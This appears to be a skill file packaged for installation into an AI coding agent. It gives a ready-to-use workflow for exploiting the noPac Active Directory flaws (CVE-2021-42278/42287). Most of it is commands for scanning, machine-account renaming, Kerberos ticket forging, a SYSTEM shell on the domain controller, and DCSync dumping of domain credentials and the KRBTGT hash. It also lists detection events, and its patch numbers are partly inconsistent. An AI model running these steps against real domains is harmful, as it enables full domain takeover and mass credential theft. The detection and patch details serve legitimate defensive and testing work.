Anthropic-Cybersecurity-Skills exploiting-nopac-cve-2021-42278-42287

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion)

install

source · Clone the upstream repo

git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/exploiting-nopac-cve-2021-42278-42287" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-exploiting-nopac-cve-2021-42278-42287 && rm -rf "$T"

manifest: skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md

source content

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.

When to Use

When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding

Prerequisites

Familiarity with red teaming concepts and tools
Access to a test or lab environment for safe execution
Python 3.8+ with required dependencies installed
Appropriate authorization for any testing activities

Objectives

Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
Create or leverage a machine account with modified sAMAccountName
Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
Use the DC ticket to perform DCSync and dump domain credentials
Achieve Domain Admin access from a standard domain user account
Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

T1068 - Exploitation for Privilege Escalation
T1136.002 - Create Account: Domain Account
T1078.002 - Valid Accounts: Domain Accounts
T1558 - Steal or Forge Kerberos Tickets
T1003.006 - OS Credential Dumping: DCSync

Workflow

Phase 1: Vulnerability Scanning

Check if the domain is vulnerable using the noPac scanner:

# Using cube0x0's noPac scanner
python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1

# Using CrackMapExec module
crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac

Verify the MachineAccountQuota (default is 10, allows any user to join computers):

# Check MachineAccountQuota via LDAP
python3 -c "
import ldap3
server = ldap3.Server('10.10.10.1')
conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
print(conn.entries[0]['ms-DS-MachineAccountQuota'])
"

Phase 2: Exploitation with noPac Tool

Run the full noPac exploit chain:

# Using cube0x0's noPac (gets a shell on the DC)
python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  -dc-host DC01 -shell --impersonate administrator -use-ldap

# Using Ridter's noPac (alternative implementation)
python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  --impersonate administrator -dump

The exploit automatically:
- Creates a new machine account (or uses an existing one)
- Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
- Requests a TGT for the spoofed account name
- Restores the original sAMAccountName
- Uses S4U2self to obtain a service ticket impersonating the target user
- The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

With the obtained Domain Controller ticket, perform DCSync:

# DCSync using secretsdump.py with the Kerberos ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local

# Or directly through the noPac shell
# The shell runs as SYSTEM on the DC

Alternatively, obtain a semi-interactive shell:

python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
  -dc-host DC01 -shell --impersonate administrator -use-ldap

Phase 4: Manual Exploitation Steps

Create a machine account:

addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'

Clear the SPN and rename sAMAccountName:

# Rename machine account sAMAccountName to DC name (without $)
renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'

Request a TGT for the spoofed name:

getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'

Restore the original machine name:

renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
  -dc-ip 10.10.10.1 domain.local/user:'Password123'

Use S4U2self for impersonation:

export KRB5CCNAME=DC01.ccache
getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
  -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'

Tools and Resources

Tool	Purpose	Platform
noPac (cube0x0)	Automated scanner and exploiter	Python
noPac (Ridter)	Alternative exploit implementation	Python
Impacket	Kerberos ticket manipulation, DCSync	Python
CrackMapExec	Vulnerability scanning module	Python
Rubeus	Windows Kerberos ticket operations	Windows (.NET)
secretsdump.py	Post-exploitation credential dumping	Python

CVE Details

CVE	Description	CVSS	Patch
CVE-2021-42278	sAMAccountName spoofing (machine accounts)	7.5	KB5008102
CVE-2021-42287	KDC PAC confusion / privilege escalation	7.5	KB5008380

Detection Signatures

Indicator	Detection Method
Machine account sAMAccountName change	Event 4742 (computer account changed) with sAMAccountName modification
New machine account creation	Event 4741 (computer object created)
TGT request for account without trailing $	Kerberos audit log analysis
S4U2self requests from non-DC machine accounts	Event 4769 with unusual service ticket requests
Rapid sequence: create account, rename, request TGT	SIEM correlation rule for noPac attack pattern

Validation Criteria

Domain scanned for noPac vulnerability
MachineAccountQuota verified (default 10)
Exploit executed successfully (shell or DCSync)
Domain Admin privileges obtained from standard user
DCSync performed to dump domain credentials
KRBTGT hash obtained for persistence validation
Attack chain documented with timestamps
Patch status verified (KB5008380, KB5008602)